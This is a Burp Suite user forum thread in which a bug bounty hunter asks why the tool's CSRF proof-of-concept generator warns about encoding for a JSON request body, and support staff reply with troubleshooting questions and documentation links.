Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Problem generating a CSRF PoC

Zonduhackerone | Last updated: Oct 15, 2019 09:15PM UTC

I understand how basic CSRF works and i have reported some csrf issue to some bug bounty programs in the past, but i have encountered this issue that i don't know what to do. I get this little message when trying to generate a CSRF PoC on a POST request without csrf token or headers: > Warning: The CSRF form uses a different encoding type than the original request, and so the application may not process the request in the way required. Further, the CSRF form uses plain text encoding, and the request body cannot be exactly reproduced because it does not contain the = character. Try modifying the original request so that the body contains the = character. Where exactly i should add the = character if the original requests looks liek this, example: {"phoneNumber":"+ 48-695-5581-39","zipCode":"12-312"} i have tried all forms of the CSRF poc generator and all of them didn't work. Hope you can help me, thanks.

Mike, PortSwigger Agent | Last updated: Oct 16, 2019 10:30AM UTC

Looking at the source code, it appears this error message is raised when the encoding type specified by the Content-Type header is unable to be determined, or if it is different to the Encoding Type specified in the user interface panel. Is what you have selected in the user interface different from what is specified in the Content-Type header of the request?

test | Last updated: Jul 15, 2020 07:08PM UTC

the content-type is application/json

test | Last updated: Jul 15, 2020 07:12PM UTC

Is it possible to do csrf when content-type is application/json

Uthman, PortSwigger Agent | Last updated: Jul 16, 2020 08:52AM UTC

Have you added the Content-Type header into the original request? Or did it already exist? I can only replicate your issue when specifically adding the Content-Type: application/json header to a request where it was not originally present.

Saransh | Last updated: Jun 19, 2021 01:41PM UTC

hey @uthman b3twise here with different account lol the Content-Type: application/json was already there in the original request. is it possible to do csrf when content type is application/json ?

Uthman, PortSwigger Agent | Last updated: Jun 21, 2021 08:33AM UTC

Hi, You may find these links helpful in investigating this further: - https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc - https://medium.com/@ethicalevil/lets-talk-csrf-again-e58bd5b240ca

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.